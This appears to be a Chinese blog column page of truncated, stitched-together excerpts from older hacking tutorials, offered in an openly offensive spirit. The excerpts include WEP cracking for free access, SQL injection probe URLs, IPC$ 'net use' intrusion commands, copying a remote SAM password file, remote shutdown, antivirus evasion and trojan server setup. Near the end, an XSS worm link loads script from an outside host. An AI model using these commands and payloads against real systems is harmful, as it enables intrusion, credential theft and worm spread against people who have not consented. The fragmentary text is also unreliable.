zhdd1234的专栏

http://www.hackbase.com/soft/2009-07-09/20041.html 指定网站http://www.hackbase.com/soft/2009-04-14/19245.html 指定IP

自从买了笔记本之后，无线网卡经常会收到一些无线网络，信号很强，但是都连不上去，要密码。难道只能看着流口水?那当然不会，要的就是免费上网!　　现在无线的加密方式主要有两种：WEP和WPA。目前来说，WPA的破解方式目前还仅限于穷举法，如果猜解字典里没有密码，那就束手无策。而WEP，只要数据包足够，就有机会破解出来　　WEP是一种在接入点和客户端之间以“RC4”方式对分组信息进行加密的技术，密

 何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同，MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件，放到网页上利用IE和OE的编码漏洞实现自动下载和执行。　　然而BMP木马就不同，它把一个EXE文件伪装成一个BMP图片文件，欺骗IE自动下载，再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹，找到下载后的BMP文件

该文章已发表于《黑客X档案》0906期,后由原创作者友情提交到邪恶八进制信息安全团队，转载请著名原作者和原始出处　　最近Blog人气疯狂下跌，就随便发篇垃圾文过来广告一下Blog，希望大牛们不要B4我.　　就快要高考了，好长时间没上网了。今天好不容易抽出点时间，刚上QQ一个我不认识的小子就说要给我个黄站发布器，我一高兴就要了因为我在网吧，也没多想就直接运行了，结果刚运行文件一下子就没了，过

检测可否注入　　http://127.0.0.1/xx?id=11 and 1=1 (正常页面)　　http://127.0.0.1/xx?id=11 and 1=2 (出错页面)　　检测表段的　　http://127.0.0.1/xx?id=11 and exists (select * from admin)　　检测字段的　　http://127.0.0.1/xx?id

　一篇老文章了　　net use //192.168.0.1/ipc$Content$nbsp;"" /user:administrator　　提到139端口，我想知道的人一定非常多，本来是不想用写这个教程的，但考虑要照顾到新人，所以还是简单的写一下。　　首先，连接的命令是：　　netuse//IP地址/ipc$Content$lt;空格>密码/user:用户名　　假设我要连接

 SQL注入自动扫描工具中的语句  包括猜解数据库库名、表名、字段名、字段内容（表内容）、表条数，以及测试相关的权限。  （mssql/mysql)  ＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝  GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73  GET http://xgzx.w

大家是否想看看国外的黑客网站，大家是否因为不懂外语而看不了国外黑客站点而烦恼。哼哼，你们知道我是怎么看国外网站的。请看：首先当然要找到要看的网站了，我这里就看“http://www.milw0rm.com/”然后打开google搜索的首页：G.cn然后搜索http://www.milw0rm.com/接着就出现了搜索结果找到网址是http://www.milw0rm.com/的右上方有个“

----collect dying site:http://www.idying.cn欢迎大家一起讨论先说下定位方法:1  NOD32不能正向定位的，定位出来也是不能修改的！针对nod32应该选择反向定位，开始位置为400填充不一定是90 可以使任意的 现在填90有时候被干扰的2 使用排除法收集下目前免杀过NOD32的方法源码：1源码免杀的另类方法函数的延迟加载例：

利用SQL Injection入侵数据库                以在其中一个加上单引号来进行试验  http://localhost/test.asp?username=isno&password=some’  根据IIS的配置不同可能会显示“HTTP 500 - 内部服务器错误”这样的信息，这也是存在SQL Injection漏洞的证据。当然也可能对方的ASP程序的错误处理写的好，那么可

http://www.hackbase.com/soft/2009-08-21/20689.html 51汇编集成开发环境 2.8.2

我是一个程序设计者，以多年开发程序的经验，对深圳福彩中心黑客案进行一下分析：　　1、疑犯算不上黑客，起码算不上高明的黑客　　黑客侵入一台计算机并且安装了木马，就意味着对这台计算机拥有了控制权，(通常将这样的计算机称为肉鸡)。只要不暴露，黑客对肉鸡的控制可以一直持续到这台计算机重装操作系统。黑客，其实就是一些别有用心的程序高手。他们的主要作案工具就是“程序”。而程序一个最大的特点，就是可以无

的话，那他前面的就是用户。　　这里的用户是PENTIUMII。　　8：Shutdown　　关了对方的NT服务器的命令　　Shutdown IP地址 t:20　　20秒后将NT自动关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。　　9：DIR　　这个命令没什么好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。　　你可以本地试下。

菜鸟必练入侵命令　　1：NET　　只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！　　这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1　　net use 127.0.0.1ipc$ “123456″ /user:”hbx”　　退出的命令是　　net use 127.0.0.1ipc$ /delte　　下面的操作你必须登陆后才

放在x:winntrepairsam._ sam._是数据库的文件名　　下面就把127.0.0.1的数据库复制到本地C盘下　　copy 127.0.0.1admin$repairsam._ c:　　———————-　　6：set　　如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用SET命令！　　下面是我得到的结

1. http://usa.5944.net/ ftp空间2. 更新ip  外网的是 http://www.ip138.com3.内网的需要映射如图   有截图的 （看 鸽子映射 教程）4，生成服务端 点击运行 即可看到自己已经上线了 呵   

黑客，一个让人又爱又恨的字眼。     很多朋友想学黑客，但又不知道如何下手。其实，大家不必把黑客想得多少神圣，黑客也是人，他也要吃饭，睡觉！工作，学习！说实在，他比我们多的只是些技术。没什么特别，很多刚接触的菜鸟总把黑客想得多少多少的神气，其实完全没必要。真正的黑客他是不会打包自己的。他只会让自己看起来是多么多么的平凡。有些人，整天以"黑客"自居，这种人绝对不要相信。黑客守则中说得很清楚：黑客绝

　21端口是默认的FTP端口，利用方式：弱口令探测/溢出　　目前我还没看到远程溢出的，SERU的本地溢出漏洞风靡一时，曾经很多服务器就在沦丧于这个漏洞。　　这个端口可以参照网上的教程，就不多说了，下面的TELNET也是一样，扫描到了弱口令直接登陆上去。　　22端口　　22端口是SSH远程登录协议，利用方式：弱口令探测　　23端口　　23端口是TLENET的默认端口，利用方式

最近心血来潮想研究下ajax worm的传播，偶然发现了天际网的几处xss漏洞，其中一处为俱乐部处留言的地方没过滤好导致xss攻击。就写个ajax worm来玩玩了。分析：由于没有对script标记做很好的限制，使ajax worm的应用起来相对就容易的多了。字符限制为1000，可以直接写源码进页面了。刚开始用xmlhttp来获取数据和提交数据，不知道怎么回事，在IE下调试能用，在firefox下

绕过验证码 http://www.anqn.com/article/a/2006-09-19/a0982290.shtml

nowish网址:http://www.mayi.com/在空间设置–>友情链接–>名称中，可以加入Js代码，要实现蠕虫的功能，就要自动加链接，刚好找到一个GET的方法:http://www.mayi.com/ajax/links.aspx?action=add&title=baidu%253Cscript%2Fsrc%253Dhttp%253A%2F%2Fxx.3322.org%2Fmayi